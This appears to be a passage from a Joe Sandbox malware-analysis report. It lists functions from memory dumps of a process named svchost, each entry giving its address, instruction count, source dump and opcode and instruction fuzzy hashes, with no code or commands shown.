                                • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                Function 03C5B2C0 Relevance: .6, Instructions: 629COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                • Instruction ID: 77b09d09677fc85c6ab31df57f2df1c4936ad803d6b7002ea21d41b0b8aa1c2f
                                • Opcode Fuzzy Hash: 373c7826561699dc3d5aca93c4d672f5c0483be2f5678bb18a9fe4d06248e608
                                • Instruction Fuzzy Hash: D7329976E002199BCF24DFA8C884AAEBBB1FF54714F190029EC05EB381EB359D41CB94
                                Function 03CC8158 Relevance: .6, Instructions: 617COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                • Instruction ID: 714e461ee81374bc0acaa7fb164c481b9a56445cad93ac4ac82ec070d8ef19c7
                                • Opcode Fuzzy Hash: e517f0956ffd44887f40ed7793f9bd5fd07f9ad37621ad8fa5c3a882db9d706a
                                • Instruction Fuzzy Hash: E7423975A103599FDB24CF69C881BAEF7B5BF88300F19819DE949EB241D734A981CF60
                                Function 03C42840 Relevance: .6, Instructions: 605COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 049e87d4e451a4083991cb2db1116da627717ee9c7cd5c8951fc22d8579f314a
                                • Instruction ID: e8605782b5a4978f14ce85bad56ed8af3f2f6184850bbd4d5c87c7154d6ee156
                                • Opcode Fuzzy Hash: 049e87d4e451a4083991cb2db1116da627717ee9c7cd5c8951fc22d8579f314a
                                • Instruction Fuzzy Hash: BD320E74A007558BEF24CF6AC8487BEFBF6AF84320F1A455AE446DF284D735A921CB50
                                Function 03CDA118 Relevance: .6, Instructions: 591COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                • Instruction ID: 64f2683dfbd8f484c7e36b3ae689a9b624088853f97251c668ef6c63b7a3c77c
                                • Opcode Fuzzy Hash: 480222e85fa6bbf1c0fd7fba6e02e9a616ebf13f43d33f306fbd067993b0fb5c
                                • Instruction Fuzzy Hash: E422AD78204651CFDB24CF2AC094772B7F1AF45300F18889AFA96CF685E735E692DB61
                                Function 03CF16CC Relevance: .6, Instructions: 571COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                • Instruction ID: 0efa3fa15b15182e0a8be9f85d01267a049cd5cfb1fa2c26033f31bb78de6074
                                • Opcode Fuzzy Hash: afcba136958c0d2f52006177652e323338911490b871630f98f5a3ccebbb11ae
                                • Instruction Fuzzy Hash: A5228035A00216CFCB59CF59C490AAAF7B6FF88314B2D456DDA56DF344DB30AA41CB90
                                Function 03C5FB80 Relevance: .6, Instructions: 559COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 240b4920a2ddec6e511c4b7b971baa932756a04fbb1e6775d05e48a26fbdc642
                                • Instruction ID: dfb54ad5c3e970a727378f14fce1b0289943fe7c6e2ccc0a9e19560a6a4fa58b
                                • Opcode Fuzzy Hash: 240b4920a2ddec6e511c4b7b971baa932756a04fbb1e6775d05e48a26fbdc642
                                • Instruction Fuzzy Hash: 7C22D37590061AEFDB14DFA8C880BAEB7B5FF44358F1485A9E814DF245E730EA85CB90
                                Function 03CF1D5A Relevance: .6, Instructions: 559COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f485338e28e3e8b780df10c6e0bdd7e34c191df7c5478d8b57fedf25a77a8585
                                • Instruction ID: bb8842610aec8f10f225b703fc5ade8496177a63d353b9a12676664c6f34722f
                                • Opcode Fuzzy Hash: f485338e28e3e8b780df10c6e0bdd7e34c191df7c5478d8b57fedf25a77a8585
                                • Instruction Fuzzy Hash: 4122A0396047128FC759CF29C490A2AF3E5FF88314B198A6DEA96CF351D730E946CB91
                                Function 03C58DBF Relevance: .6, Instructions: 554COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19ad5b167e43cc9a51cb77d41b2704fd78edf76dbf7847f2aece7d52f87feb43
                                • Instruction ID: 9d61acf876348ec261f6e80cb6f73a466d91dd2ff633a283da447a94123f8716
                                • Opcode Fuzzy Hash: 19ad5b167e43cc9a51cb77d41b2704fd78edf76dbf7847f2aece7d52f87feb43
                                • Instruction Fuzzy Hash: 41225E74E00216DBDF14CF95C4849BEFBF6BF48704B19819AE846EB241E774EA81CB64
                                Function 03CF2446 Relevance: .5, Instructions: 485COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2858f221d82e5dea364321fa68a241d704ba14e4d5be273df83f245aab8ff58e
                                • Instruction ID: 0c20314ab419698c5892a2f7b87591e97b45e0e65ace7d5cc5c4af929b50604e
                                • Opcode Fuzzy Hash: 2858f221d82e5dea364321fa68a241d704ba14e4d5be273df83f245aab8ff58e
                                • Instruction Fuzzy Hash: 660204796046518FDBA4CF2AC450375FBF1EF85300B19899AEAD6CF281D734EA42DB60
                                Function 03D0B16B Relevance: .4, Instructions: 450COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                • Instruction ID: 2fb3835cefedcf4f5160eb4aaa2ba4f99a794f9eaac93e729dd011a9e1c6e483
                                • Opcode Fuzzy Hash: 54927d9dc4ad27ff5527c6dc0caa83e755990f2780f6c778783c7222936e7a85
                                • Instruction Fuzzy Hash: D7F1E572E046118BCB18CFB9C9A077EFBF5EF98600719416AD4A6DB3C0D674EA41CB90
                                Function 00410333 Relevance: .4, Instructions: 435COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396167020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                • Instruction ID: 678d2bb3817cb984d3af0f4bf9fd3c4a59ec621a3af90c12dd0a1f82b3026cc6
                                • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                • Instruction Fuzzy Hash: A1026E73E547164FE720CE4ACDC4765B3A3EFC8301F5B81B8CA142B613CA79BA525A90
                                Function 03D0A9A6 Relevance: .4, Instructions: 425COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                • Instruction ID: 67742d581f7ca19ccbd65b9e80646d9f10d785d3794b6141b6bd11a4e304851f
                                • Opcode Fuzzy Hash: 05ad5870a95c0dec24100b27634f4e8665db5764e8f9d177e7894394216b9e57
                                • Instruction Fuzzy Hash: DEF1D677E006269BCB18CE68C5A06BDFBF5EF45610B1A426AD856EB3C0D734DE41CB90
                                Function 03C5FDC0 Relevance: .4, Instructions: 390COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                • Instruction ID: 4a3fa9e4b51e49539424323f0f4ef2be45b5a5e7a903ef397266288da4392617
                                • Opcode Fuzzy Hash: 58e89fd9b27b4f16369ee6e9f8d42b6c93f2d583326aa24f2aa84c0c06bb0714
                                • Instruction Fuzzy Hash: DBF1917490061ADFDB14DFA8C880BAEB7B5FF48308F1885A9E815DB345E734DA85CB90
                                Function 03C28397 Relevance: .4, Instructions: 380COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                • Instruction ID: a9ceee2fd36f8d5c220c0074a4cc8a1b4b06f0ee7f88a381e489b7d4631cc9e9
                                • Opcode Fuzzy Hash: 68632295a5e6b08fc4f35686167cbf91b5494f782c55964ed413408bc94fea54
                                • Instruction Fuzzy Hash: 4CD1C475A007269BCF14EF65C890ABABBB5BF44708F094629F915DF280EB34EA45CB50
                                Function 03C5C6E0 Relevance: .4, Instructions: 367COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                • Instruction ID: 2a4a86ed1cb7e697710a7a7c0f4162716b8915deaaea04eeb9b21f1541bace45
                                • Opcode Fuzzy Hash: dcf7e154ba3d11db12221a79477c9d077c09de4965553be051bdbd2eb90796dd
                                • Instruction Fuzzy Hash: 29D14C72E043198BDF28CA99C5843BDBBB5FB54344F19C06AE842EB695D7748AC1CB48
                                Function 03C438E0 Relevance: .3, Instructions: 349COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7952a73fcb0c06d3ae1428ad145019e6c7a3ac904cd06d2ef93a2566d25f672
                                • Instruction ID: ea38034448a7249a0b47cf1357cf7215789ae1e2ddaf55fdfb4c685866b0bcfa
                                • Opcode Fuzzy Hash: e7952a73fcb0c06d3ae1428ad145019e6c7a3ac904cd06d2ef93a2566d25f672
                                • Instruction Fuzzy Hash: 0AE17D75A002458FDB18CF59C884BAAF7F5FF98310F19819AE855EB391D730EA51CB90
                                Function 03C4CFE0 Relevance: .3, Instructions: 345COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 47f9d116f930cc40313cfd420fff7415493c598fc89b5355c3ebff360374c387
                                • Instruction ID: d9ab39af31f9c792273f977cd750dcd40d7268fb34ea03c6cb8938fe6e8f5535
                                • Opcode Fuzzy Hash: 47f9d116f930cc40313cfd420fff7415493c598fc89b5355c3ebff360374c387
                                • Instruction Fuzzy Hash: F7D1C431B003198FDB34EB25C898BAAF7B5BB45314F0940E9D90ADB242DB75AE85CF51
                                Function 03C3D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                • Instruction ID: 36cf4d49f2b9f0404de4cfe390480388e7d6d5a2803ddabd13e8a08a00aa0104
                                • Opcode Fuzzy Hash: a3124092b18c1185750ccf5bbf40d3549ab01253326b6e7db0c49f220eadbd46
                                • Instruction Fuzzy Hash: BBC1A571E002169BEF18CF5AC848BAEF7B5EF55314F198269D815EB280D771EA42CB81
                                Function 03CB8243 Relevance: .3, Instructions: 322COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                • Instruction ID: d334c1a31b82a34959d35abcfe95cdf579f016b65461ef4716b7bcd4152f0a78
                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                • Instruction Fuzzy Hash: CFB13E78A00748AFDF24DF95C980AEBB7BDFF84304F144469A942EB790DA35EA45DB10
                                Function 03C40535 Relevance: .3, Instructions: 300COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                • Instruction ID: 0f259f5ac383e79320f5477814559ae95be2d4b5d80856cf2eb3fde404c9d76d
                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                • Instruction Fuzzy Hash: 5BB12535600655AFEF25DB69C844BBEFBF6EF84200F1A0199D642DF281DB30EA41DB90
                                Function 03C590DB Relevance: .3, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                • Instruction ID: 23f397a18733344356864ad61c056dc7f10c4437d0abb20fb2d6b52ec3e86710
                                • Opcode Fuzzy Hash: f92fbd45898c2da03748067d30bf3191a3e44c87833c750e9acb7d61e9cbd0a4
                                • Instruction Fuzzy Hash: 32A16A75900205AFEB12EFA4CC49FAE77B9AF45750F060094F901EF2A0D775AD50DBA4
                                Function 03C383C0 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                • Instruction ID: 62cb4eb96a79b102cad59048c22df6155458c89986f8e7f3f7ade8214e11a4d3
                                • Opcode Fuzzy Hash: d4aba702a05b78d9ca217e2124169597e92c1977c8e2086359d66209299cb692
                                • Instruction Fuzzy Hash: 68C169741083418FEB64CF15C495BAAB7E4FF88704F49496EE989CB290D774EA08CF92
                                Function 03C70185 Relevance: .3, Instructions: 276COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                • Instruction ID: 3bf16fdc07a13450a0073aa4b36b2845eb358b136bba97ba829e7be4bddeb119
                                • Opcode Fuzzy Hash: c968b0e4dd8eab9e6e16fce3eb331ef7f573e6de141b791e9f311a0e7e6852fd
                                • Instruction Fuzzy Hash: A8A1C175A0072ADBDB24DF6AC991BAAB7F5FF44318F044129EE05DB281DB34E901DB50
                                Function 03CB60E0 Relevance: .3, Instructions: 264COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                • Instruction ID: 24d1ab849e22ac93968fd24f81458c50e30096d4dfd797de98819199cfa9600c
                                • Opcode Fuzzy Hash: 43daf1486e112ea1653f4aa484bcc75e2c4297b6cb4f4da2e294b0fd9e39aaf8
                                • Instruction Fuzzy Hash: 0D91B071E00215AFDB15CFA8D884BEEFBB9AF48700F154169E951EB340D738EA509BA0
                                Function 03C4E3F0 Relevance: .3, Instructions: 261COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                • Instruction ID: ffce50bc57664964dd1f114cd67254298e06f74f0dee9c3d5f080b6400e3ded6
                                • Opcode Fuzzy Hash: 40faecd83f0643dfe04d81da684b845ea0da2725f9d89854bf38603903f914d7
                                • Instruction Fuzzy Hash: 1A910436A007258BEB24EB79D448B7EB7A5FF84714F0B40AAE805DF240EB34DA41C791
                                Function 03C31131 Relevance: .3, Instructions: 259COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                • Instruction ID: 3ca5ff5da37b684c5d074b7dfdd7ecc99c164f23ba3613204f6b28b82d1f8048
                                • Opcode Fuzzy Hash: e5ccda8bb4b9bdc01734c0f3ac518810ecf0a3f6867367ee81e77842bac9d5b9
                                • Instruction Fuzzy Hash: FEB10275A093408FD354DF28C580A5AFBF1BB89304F184A6EF899DB351D371EA45CB52
                                Function 03C64750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                • Instruction ID: efd3e8be87051e0fd9e9441e3d5e9dbe69e9fdfdf7e403425c2bfb53e152fa67
                                • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                • Instruction Fuzzy Hash: 48817A36E047D68FDB29CEAEC8D02ADFB55EF56204B2C467AD542CF241C225D986C391
                                Function 03C7DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                • Instruction ID: d1b85583018ec38e75dc2f59bb9a0644196fe3bc11a8fcc41409d20e9a8cd483
                                • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                • Instruction Fuzzy Hash: BA915372620A06CFD725CF2DC889662BBE0FF55364F188A18E8E7DB6A0C375E511CB10
                                Function 03CFF7B0 Relevance: .2, Instructions: 242COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d2117f0242b49a1b4a6a81cc0f584b7417b60f386dd1649b1b14860ec85de9e
                                • Instruction ID: 1ab1bb397fae8db0cc5f5d43c9b330d412ac7f659a65b13ab1eb714cd332bae0
                                • Opcode Fuzzy Hash: 7d2117f0242b49a1b4a6a81cc0f584b7417b60f386dd1649b1b14860ec85de9e
                                • Instruction Fuzzy Hash: 4291E372E00206AFDB54CF29C8807AABBE5EF49310F19857CEA55DF291D774EA11CB90
                                Function 03CFF43F Relevance: .2, Instructions: 241COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aadfba181bc8f3040fadc7f8b18cb582a8cabe5b5f0588eff71b90d0f5db444c
                                • Instruction ID: d2d5e7ab0bb989b80f264209c4240dbc526ab3b171d76463b2702763faf041e3
                                • Opcode Fuzzy Hash: aadfba181bc8f3040fadc7f8b18cb582a8cabe5b5f0588eff71b90d0f5db444c
                                • Instruction Fuzzy Hash: E691C072A005159FCF58CF69C8906BEBBF2EF88310F1986ADE915DB395D634EA01CB50
                                Function 03CF81CC Relevance: .2, Instructions: 232COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18c555c25d69994f8bd0e23118e91006bd4adfb96ce148a0f86c801ab0d395ee
                                • Instruction ID: 1d25c771b4c5f0aeee939aaec364c3ecedd5e36369cb6ae23ff478c2bae81daa
                                • Opcode Fuzzy Hash: 18c555c25d69994f8bd0e23118e91006bd4adfb96ce148a0f86c801ab0d395ee
                                • Instruction Fuzzy Hash: 7D81B472E006199FCB54CF69C8805AEB7F5FF88310B19426AD925EB280D774EA56CB90
                                Function 03C40E59 Relevance: .2, Instructions: 231COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3d59b03abed515b4f2fad9274ae49d856599978870cf4b289318d1b240bdaa69
                                • Instruction ID: 99ead5978fb694f098e716396c04fa592e9b5c299babc63e145b95d7a096ceaa
                                • Opcode Fuzzy Hash: 3d59b03abed515b4f2fad9274ae49d856599978870cf4b289318d1b240bdaa69
                                • Instruction Fuzzy Hash: 3D819631A00669DFDB14CE5AC8849AEFBB2FF85210B29C2A5E954DF345D730DA41CB90
                                Function 03CEE4F6 Relevance: .2, Instructions: 224COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: baedd80ead76611a0c6d4f54bccb2bf23cf405e8b0c0feca065e2083989cd16f
                                • Instruction ID: 5e6a269567cd9af300997dde59159680c6026540f25beebd6cf87a9e2cd56cfd
                                • Opcode Fuzzy Hash: baedd80ead76611a0c6d4f54bccb2bf23cf405e8b0c0feca065e2083989cd16f
                                • Instruction Fuzzy Hash: 0B819176E002159BCB18DFA9C5906ADFBF5EF88350F19816AD816EF385D7309E41CB90
                                Function 03CFAB40 Relevance: .2, Instructions: 222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.2396528634.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                • Instruction ID: 802b6d236b02fb566779e7483cc2d4b5b1324042d2939d4b5eda4bacd32e3eeb
